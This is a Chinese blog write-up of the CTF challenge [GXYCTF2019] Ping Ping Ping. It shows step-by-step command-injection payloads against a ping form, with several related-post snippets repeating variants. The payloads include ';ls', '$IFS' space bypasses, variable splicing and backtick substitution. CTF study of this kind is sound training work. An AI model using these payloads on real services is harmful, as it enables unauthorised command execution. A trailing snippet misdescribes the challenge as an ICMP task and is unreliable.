[GXYCTF2019]Ping Ping Ping1

原创 已于 2024-10-21 23:14:05 修改 · 708 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2023-11-09 19:13:44 首次发布
文章讲述了如何通过构造payload,利用IP地址和特殊字符技巧,绕过PHP脚本的安全检查,最终获取flag的过程,涉及本地回环地址、过滤机制和Linux内部变量的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题步骤:

  • 提示: /?ip=
    • 这是URL中的查询参数,用于指定目标服务器的IP地址
  • 构造payload: /?ip=127.0.0.1;ls
    • 尝试将参数ip的值设置为127.0.0.1
    • 127.0.0.1是本地回环地址,用于指代本机,当一个应用程序需要与本地进行通信时,可使用127.0.0.1作为目标地址
    • “;”作为分隔符,将命令与前面的参数分开
    • 在本地主机执行ls命令,以列出当前目录中的文件和文件夹
  • 回显: 
    • 出现了flag.php
  • 构造payload: /?ip=127.0.0.1;cat flag.php
    • 尝试读取flag.php的内容
  • 回显: /?ip= fxck your space!
    • 过滤了空格
  • 构造payload: /?ip=127.0.0.1;cat$IFS$1flag.php
    • 在Linux中,可以使用$IFS(Internal Field Separator)变量来绕过空格
  • 回显: /?ip= fxck your flag!
    • 猜测应用程序对flag这个关键字进行了过滤
  • 构造payload: /?ip=127.0.0.1;cat$IFS$1index.php
    • 查看index.php里的内容
  • 回显:
    • 一段PHP脚本,用于检测用户输入的IP地址是否包含恶意字符(通配符等)
    • 如果包含恶意字符,程序将输出相应的错误信息并终止执行
    • 否则,程序将使用ping命令测试该IP地址的连通性,并输出结果
  • 构造payload: /?ip=127.0.0.1;cat$IFS$1反引号ls反引号
    • 反引号在键盘左上方(和波浪线同一格~)在这里的作用是将命令的输出当作输入执行
  • 回显
    • 查看源代码,得到flag

 

 

GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1719
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
[GXYCTF2019]Ping Ping Ping 1
weixin_45674567的博客
07-08 1611
直接尝试:/?ip=127.0.0.1;ls; 看到flag.php,尝试读取:他提示不能有空格,绕过试一试: 尝试,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的/**/、%0a、IFS等都被过滤了,但{IFS}等都被过滤了,但IFS等都被过滤了,但IFS9还可以使用,于是/?ip=127.0.0.1;cat9还可以使用,于是 /?ip=127.0.0.1;cat9还可以使用,于是/?ip=127.0.0.1;catIFS$9flag.php; 又说不能出现..
BUU CTF [GXYCTF2019]Ping Ping Ping 1
qiaopeifan的博客
01-26 570
BUU CTF [GXYCTF2019]Ping Ping Ping 1打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目的ping。尝试?ip=1 1.看到ip很明显传一个Ip看看 作为菜鸟,我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 2.我们看到两个文件,完了进行访问,但是发现flag.php访问不了,大概是说有空格, 判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用 注:%20(space)、%09(t
[GXYCTF2019]Ping Ping Ping 1-BUUCTF
最新发布
ZZHow Blog
07-30 1204
本文介绍了命令注入(Command Injection)的漏洞利用方法,以[GXYCTF2019]Ping Ping Ping题目为例。通过观察题目界面发现GET方法存在ip参数,尝试用分号连接命令实现注入。在成功执行ls命令发现flag.php后,尝试绕过空格检测(使用$IFS$9)和关键词过滤(使用环境变量拼接)。最终通过开发者工具查看页面源码找到被注释的flag。文章详细展示了命令注入的测试过程和绕过技巧。 写于2023/11/15
[GXYCTF2019] Ping Ping
Sweet_vinegar520的博客
10-29 723
本题主要阴间在绕过字符和变量的运用细节上。
CTF-Web习题:[GXYCTF2019]Ping Ping Ping
LJW123487的博客
07-25 945
本题涉及知识点:命令执行漏洞,过滤绕过
[GXYCTF2019]Ping Ping Ping
weixin_65279640的博客
04-15 441
打开网站看到已经给出提示,让使用?/ip=xxx 来注入并且页面返回有ping命令,这里可以看出是ping命令,故开始绕过,需要使用命令联合注入,下面给出大佬总结的命令联合注入的笔记。空格绕过的方法有很多,下面是大佬总结的一些空格绕过的方法。发现flag好像也有点问题。页面上没有内容,刚开始以为出错了,最后发现在源代码里,点击f12。之后用cat访问flag,;之后使用{IFS}的空格绕过方法,发现有源码,之后进行flag绕过,发现{}也被禁用了,
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5507
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
[GXYCTF2019]Ping Ping Ping-rce
2301_79964672的博客
07-26 1214
ping (Packet Internet Groper),中文名称因特网包探索器,是一种计算机网络管理应用,该程序通常被用于确认因特网上的一台主机是否可达 [1]。Ping是工作在TCP/IP网络体系结构中应用层的一个服务命令, 其原理是向特定的目的主机发送ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo。
[GXYCTF2019]Ping Ping Ping 1
01-09
针对 GXYCTF2019 中名为 'Ping Ping Ping' 的挑战题,该题目属于网络安全竞赛中的网络层攻击与防御类别。虽然提供的参考资料主要讨论了连续提示上的后门攻击[^1],这与具体 CTF 题目不完全匹配,但可以借鉴其中关于协议分析和异常检测的思想来理解此 CTF 挑战。 对于 'Ping Ping Ping' 这一特定挑战,通常涉及 ICMP 协议的深入理解和应用。ICMP 主要用于在网络设备之间传递控制消息,最著名的例子就是 `ping` 命令所使用的回显请求(Echo Request)和回显应答(Echo Reply)。在实际比赛环境中,选手可能需要利用或绕过防火墙规则、识别隐藏信息或者通过修改 ping 数据包的内容来进行通信。 解决方案一般会围绕以下几个方面展开: ### 1. 抓取并分析流量 为了找到潜在的秘密通道或其他隐蔽的信息传输方式,参赛者可能会使用 Wireshark 或 tcpdump 工具捕获网络数据流,并仔细检查每一个字段,特别是那些看似无害但实际上被用来携带额外负载的部分。 ```bash tcpdump -i any icmp -w pings.pcap ``` 上述命令将会监听所有接口上所有的 ICMP 流量并将它们保存到文件 "pings.pcap" 中以便后续分析。 ### 2. 修改发送的数据包结构 有时解题的关键在于构造特殊的 ICMP 请求报文。例如,在某些情况下,可以通过改变 TTL (Time To Live) 字段或者其他头部选项实现目标主机的不同响应行为;又或者是将秘密信息编码进未受保护的有效载荷部分。 ```python from scapy.all import * def craft_custom_ping(target_ip, payload): packet = IP(dst=target_ip)/ICMP()/Raw(load=payload) send(packet) craft_custom_ping("192.168.1.1", b"hidden message") ``` 这段 Python 代码展示了如何创建一个自定义的 ICMP Echo Request 并向指定的目标地址发送带有特殊有效载荷的消息。 尽管这些方法和技术能够帮助解决问题,但是具体的实施细节取决于主办方设置的具体条件以及所提供的线索。因此建议回顾赛事期间官方给出的相关提示,并尝试重现当时的环境以更好地模拟解答过程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值